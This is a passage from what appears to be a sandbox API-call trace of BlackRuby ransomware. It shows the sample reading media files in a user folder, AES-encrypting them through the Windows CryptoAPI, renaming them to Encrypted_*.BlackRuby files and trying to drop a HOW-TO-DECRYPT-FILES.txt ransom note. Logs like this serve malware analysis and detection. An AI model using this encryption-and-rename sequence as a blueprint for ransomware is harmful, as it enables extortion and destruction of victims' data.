lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_jR3vc2TD66VXQR98NRl4we8mvIbeATalYjl7.BlackRuby", lpFilePart=0x0) returned 0x59 [0051.339] GetLastError () returned 0xb7 [0051.339] SetErrorMode (uMode=0x1) returned 0x0 [0051.339] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\r0ebeehigi.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb3c6c2f0, ftCreationTime.dwHighDateTime=0x1d34fbc, ftLastAccessTime.dwLowDateTime=0xa2bf9190, ftLastAccessTime.dwHighDateTime=0x1d358a8, ftLastWriteTime.dwLowDateTime=0x26ccfe80, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4da0)) returned 1 [0051.339] GetLastError () returned 0xb7 [0051.339] SetErrorMode (uMode=0x0) returned 0x1 [0051.339] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\R0EbEEhIGI.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\r0ebeehigi.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_jR3vc2TD66VXQR98NRl4we8mvIbeATalYjl7.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_jr3vc2td66vxqr98nrl4we8mvibeatalyjl7.blackruby")) returned 1 [0051.340] GetLastError () returned 0xb7 [0051.340] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.340] GetLastError () returned 0xb7 [0051.340] SetErrorMode (uMode=0x1) returned 0x0 [0051.340] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.340] GetLastError () returned 0x5 [0051.342] SetErrorMode (uMode=0x0) returned 0x1 [0051.342] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv", lpFilePart=0x0) returned 0x39 [0051.342] GetLastError () returned 0x5 [0051.342] SetErrorMode (uMode=0x1) returned 0x0 [0051.342] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\rminup4pny4v7heb6y0m.mkv"), fInfoLevelId=0x0, lpFileInformation=0x1c8d238 | out: lpFileInformation=0x1c8d238*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xba5aeb40, ftCreationTime.dwHighDateTime=0x1d34e05, ftLastAccessTime.dwLowDateTime=0xabb04280, ftLastAccessTime.dwHighDateTime=0x1d354b7, ftLastWriteTime.dwLowDateTime=0xabb04280, ftLastWriteTime.dwHighDateTime=0x1d354b7, nFileSizeHigh=0x0, nFileSizeLow=0x112d4)) returned 1 [0051.342] GetLastError () returned 0x5 [0051.342] SetErrorMode (uMode=0x0) returned 0x1 [0051.343] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv", lpFilePart=0x0) returned 0x39 [0051.343] GetLastError () returned 0x5 [0051.343] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv", lpFilePart=0x0) returned 0x39 [0051.343] GetLastError () returned 0x5 [0051.343] SetErrorMode (uMode=0x1) returned 0x0 [0051.343] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\rminup4pny4v7heb6y0m.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.343] GetLastError () returned 0x0 [0051.343] GetFileType (hFile=0x184) returned 0x1 [0051.343] SetErrorMode (uMode=0x0) returned 0x1 [0051.343] GetFileType (hFile=0x184) returned 0x1 [0051.343] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x112d4 [0051.343] GetLastError () returned 0x0 [0051.343] ReadFile (in: hFile=0x184, lpBuffer=0x1c8efb4, nNumberOfBytesToRead=0x112d4, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c8efb4*, lpNumberOfBytesRead=0x18ed18*=0x112d4, lpOverlapped=0x0) returned 1 [0051.344] GetLastError () returned 0x0 [0051.344] CloseHandle (hObject=0x184) returned 1 [0051.344] GetLastError () returned 0x0 [0051.344] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv", lpFilePart=0x0) returned 0x39 [0051.344] GetLastError () returned 0x0 [0051.344] SetErrorMode (uMode=0x1) returned 0x0 [0051.344] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\rminup4pny4v7heb6y0m.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xba5aeb40, ftCreationTime.dwHighDateTime=0x1d34e05, ftLastAccessTime.dwLowDateTime=0xabb04280, ftLastAccessTime.dwHighDateTime=0x1d354b7, ftLastWriteTime.dwLowDateTime=0xabb04280, ftLastWriteTime.dwHighDateTime=0x1d354b7, nFileSizeHigh=0x0, nFileSizeLow=0x112d4)) returned 1 [0051.344] GetLastError () returned 0x0 [0051.344] SetErrorMode (uMode=0x0) returned 0x1 [0051.344] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c708) returned 1 [0051.345] GetLastError () returned 0x0 [0051.379] CryptImportKey (in: hProv=0x37c708, pbData=0x1d0b93c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ae0) returned 1 [0051.379] GetLastError () returned 0x0 [0051.379] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.379] GetLastError () returned 0x0 [0051.387] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.387] GetLastError () returned 0x0 [0051.387] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360a20) returned 1 [0051.387] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.387] GetLastError () returned 0x0 [0051.387] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1b51fe8*=0x1, dwFlags=0x0) returned 1 [0051.387] GetLastError () returned 0x0 [0051.387] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1b51fb4, dwFlags=0x0) returned 1 [0051.387] GetLastError () returned 0x0 [0051.387] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b52030*, pdwDataLen=0x18ed08*=0x113d0, dwBufLen=0x113d0 | out: pbData=0x1b52030*, pdwDataLen=0x18ed08*=0x113d0) returned 1 [0051.387] GetLastError () returned 0x0 [0051.387] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b747fc*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b747fc*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.387] GetLastError () returned 0x0 [0051.387] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b7482c*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b7482c*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.388] GetLastError () returned 0x0 [0051.389] CryptDestroyKey (hKey=0x360ae0) returned 1 [0051.389] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.389] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0051.389] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv", lpFilePart=0x0) returned 0x39 [0051.389] GetLastError () returned 0x0 [0051.389] SetErrorMode (uMode=0x1) returned 0x0 [0051.389] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\rminup4pny4v7heb6y0m.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.390] GetLastError () returned 0xb7 [0051.390] GetFileType (hFile=0x184) returned 0x1 [0051.390] SetErrorMode (uMode=0x0) returned 0x1 [0051.390] GetFileType (hFile=0x184) returned 0x1 [0051.392] CloseHandle (hObject=0x184) returned 1 [0051.393] GetLastError () returned 0xb7 [0051.393] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv", lpFilePart=0x0) returned 0x39 [0051.393] GetLastError () returned 0xb7 [0051.393] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_QdS9bCVBzszXke8qIsxBrMiLD3W54NnCwJSLv20iH.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_QdS9bCVBzszXke8qIsxBrMiLD3W54NnCwJSLv20iH.BlackRuby", lpFilePart=0x0) returned 0x5e [0051.393] GetLastError () returned 0xb7 [0051.393] SetErrorMode (uMode=0x1) returned 0x0 [0051.393] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\rminup4pny4v7heb6y0m.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xba5aeb40, ftCreationTime.dwHighDateTime=0x1d34e05, ftLastAccessTime.dwLowDateTime=0xabb04280, ftLastAccessTime.dwHighDateTime=0x1d354b7, ftLastWriteTime.dwLowDateTime=0x26d68400, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x113e0)) returned 1 [0051.393] GetLastError () returned 0xb7 [0051.393] SetErrorMode (uMode=0x0) returned 0x1 [0051.393] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\rminUp4pnY4V7HeB6y0m.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\rminup4pny4v7heb6y0m.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_QdS9bCVBzszXke8qIsxBrMiLD3W54NnCwJSLv20iH.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_qds9bcvbzszxke8qisxbrmild3w54nncwjslv20ih.blackruby")) returned 1 [0051.393] GetLastError () returned 0xb7 [0051.394] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.394] GetLastError () returned 0xb7 [0051.394] SetErrorMode (uMode=0x1) returned 0x0 [0051.394] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.394] GetLastError () returned 0x5 [0051.395] SetErrorMode (uMode=0x0) returned 0x1 [0051.395] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi", lpFilePart=0x0) returned 0x2f [0051.395] GetLastError () returned 0x5 [0051.395] SetErrorMode (uMode=0x1) returned 0x0 [0051.395] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sci5zn_k5p.avi"), fInfoLevelId=0x0, lpFileInformation=0x1ba2f30 | out: lpFileInformation=0x1ba2f30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad22c7a0, ftCreationTime.dwHighDateTime=0x1d3549e, ftLastAccessTime.dwLowDateTime=0x38834210, ftLastAccessTime.dwHighDateTime=0x1d351d0, ftLastWriteTime.dwLowDateTime=0x38834210, ftLastWriteTime.dwHighDateTime=0x1d351d0, nFileSizeHigh=0x0, nFileSizeLow=0x16345)) returned 1 [0051.395] GetLastError () returned 0x5 [0051.395] SetErrorMode (uMode=0x0) returned 0x1 [0051.395] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi", lpFilePart=0x0) returned 0x2f [0051.395] GetLastError () returned 0x5 [0051.395] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi", lpFilePart=0x0) returned 0x2f [0051.395] GetLastError () returned 0x5 [0051.395] SetErrorMode (uMode=0x1) returned 0x0 [0051.395] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sci5zn_k5p.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.396] GetLastError () returned 0x0 [0051.396] GetFileType (hFile=0x184) returned 0x1 [0051.396] SetErrorMode (uMode=0x0) returned 0x1 [0051.396] GetFileType (hFile=0x184) returned 0x1 [0051.396] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x16345 [0051.396] GetLastError () returned 0x0 [0051.396] ReadFile (in: hFile=0x184, lpBuffer=0x2b49c10, nNumberOfBytesToRead=0x16345, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2b49c10*, lpNumberOfBytesRead=0x18ed18*=0x16345, lpOverlapped=0x0) returned 1 [0051.397] GetLastError () returned 0x0 [0051.397] CloseHandle (hObject=0x184) returned 1 [0051.397] GetLastError () returned 0x0 [0051.398] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi", lpFilePart=0x0) returned 0x2f [0051.398] GetLastError () returned 0x0 [0051.398] SetErrorMode (uMode=0x1) returned 0x0 [0051.398] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sci5zn_k5p.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad22c7a0, ftCreationTime.dwHighDateTime=0x1d3549e, ftLastAccessTime.dwLowDateTime=0x38834210, ftLastAccessTime.dwHighDateTime=0x1d351d0, ftLastWriteTime.dwLowDateTime=0x38834210, ftLastWriteTime.dwHighDateTime=0x1d351d0, nFileSizeHigh=0x0, nFileSizeLow=0x16345)) returned 1 [0051.398] GetLastError () returned 0x0 [0051.398] SetErrorMode (uMode=0x0) returned 0x1 [0051.398] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c790) returned 1 [0051.399] GetLastError () returned 0x0 [0051.433] CryptImportKey (in: hProv=0x37c790, pbData=0x1bff25c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x3609e0) returned 1 [0051.433] GetLastError () returned 0x0 [0051.433] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.433] GetLastError () returned 0x0 [0051.438] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.438] GetLastError () returned 0x0 [0051.438] CryptDuplicateKey (in: hKey=0x3609e0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360fa0) returned 1 [0051.438] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0051.438] GetLastError () returned 0x0 [0051.438] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1c2c2a8*=0x1, dwFlags=0x0) returned 1 [0051.438] GetLastError () returned 0x0 [0051.438] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1c2c274, dwFlags=0x0) returned 1 [0051.438] GetLastError () returned 0x0 [0051.439] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b763e0*, pdwDataLen=0x18ed08*=0x16440, dwBufLen=0x16440 | out: pbData=0x2b763e0*, pdwDataLen=0x18ed08*=0x16440) returned 1 [0051.440] GetLastError () returned 0x0 [0051.440] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c2c304*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c2c304*, pdwDataLen=0x18ed20*=0x10) returned 1 [0051.440] GetLastError () returned 0x0 [0051.440] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c2c334*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c2c334*, pdwDataLen=0x18ed28*=0x10) returned 1 [0051.440] GetLastError () returned 0x0 [0051.442] CryptDestroyKey (hKey=0x3609e0) returned 1 [0051.442] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.442] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0051.442] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi", lpFilePart=0x0) returned 0x2f [0051.442] GetLastError () returned 0x0 [0051.442] SetErrorMode (uMode=0x1) returned 0x0 [0051.442] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sci5zn_k5p.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.444] GetLastError () returned 0xb7 [0051.444] GetFileType (hFile=0x184) returned 0x1 [0051.444] SetErrorMode (uMode=0x0) returned 0x1 [0051.444] GetFileType (hFile=0x184) returned 0x1 [0051.446] CloseHandle (hObject=0x184) returned 1 [0051.446] GetLastError () returned 0xb7 [0051.446] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi", lpFilePart=0x0) returned 0x2f [0051.446] GetLastError () returned 0xb7 [0051.446] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_cyg9mybrqYOA13qujYxQ5qNQ6LwBzG89Vy0hBeLJVMO7Y.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_cyg9mybrqYOA13qujYxQ5qNQ6LwBzG89Vy0hBeLJVMO7Y.BlackRuby", lpFilePart=0x0) returned 0x62 [0051.446] GetLastError () returned 0xb7 [0051.446] SetErrorMode (uMode=0x1) returned 0x0 [0051.446] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sci5zn_k5p.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad22c7a0, ftCreationTime.dwHighDateTime=0x1d3549e, ftLastAccessTime.dwLowDateTime=0x38834210, ftLastAccessTime.dwHighDateTime=0x1d351d0, ftLastWriteTime.dwLowDateTime=0x26dda820, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x16450)) returned 1 [0051.446] GetLastError () returned 0xb7 [0051.446] SetErrorMode (uMode=0x0) returned 0x1 [0051.447] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sCI5ZN_K5P.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sci5zn_k5p.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_cyg9mybrqYOA13qujYxQ5qNQ6LwBzG89Vy0hBeLJVMO7Y.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_cyg9mybrqyoa13qujyxq5qnq6lwbzg89vy0hbeljvmo7y.blackruby")) returned 1 [0051.448] GetLastError () returned 0xb7 [0051.448] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0051.448] GetLastError () returned 0xb7 [0051.448] SetErrorMode (uMode=0x1) returned 0x0 [0051.448] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0051.448] GetLastError () returned 0x5 [0051.449] SetErrorMode (uMode=0x0) returned 0x1 [0051.449] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3", lpFilePart=0x0) returned 0x36 [0051.449] GetLastError () returned 0x5 [0051.449] SetErrorMode (uMode=0x1) returned 0x0 [0051.449] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sx84lhclfqe0ue87_.mp3"), fInfoLevelId=0x0, lpFileInformation=0x1c4960c | out: lpFileInformation=0x1c4960c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5e0030b0, ftCreationTime.dwHighDateTime=0x1d34a56, ftLastAccessTime.dwLowDateTime=0xc54ead90, ftLastAccessTime.dwHighDateTime=0x1d34b24, ftLastWriteTime.dwLowDateTime=0xc54ead90, ftLastWriteTime.dwHighDateTime=0x1d34b24, nFileSizeHigh=0x0, nFileSizeLow=0x18084)) returned 1 [0051.449] GetLastError () returned 0x5 [0051.449] SetErrorMode (uMode=0x0) returned 0x1 [0051.449] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3", lpFilePart=0x0) returned 0x36 [0051.449] GetLastError () returned 0x5 [0051.450] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3", lpFilePart=0x0) returned 0x36 [0051.450] GetLastError () returned 0x5 [0051.450] SetErrorMode (uMode=0x1) returned 0x0 [0051.450] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\sx84lhCLFqe0UE87_.mp3" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\sx84lhclfqe0ue87_.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0051.450] GetLastError () returned 0x0 [0051.450] GetFileType (hFile=0x184) returned 0x1 [0051.450] SetErrorMode (uMode=0x0) returned 0x1 [0051.450] GetFileType (hFile=0x184) returned 0x1 [0051.450] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x18084 [0051.450] GetLastError () returned 0x0 [0051.451] ReadFile (in: hFile=0x184, lpBuffer=0x2be59b0, nNumberOfBytesToRead=0x18084, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2be59b0*, lpNumberOfBytesRead=0x18ed18*=0x18084, lpOverlapped=0x0) returned 1 [0051.452] GetLastError () returned 0x0 [0051.452] 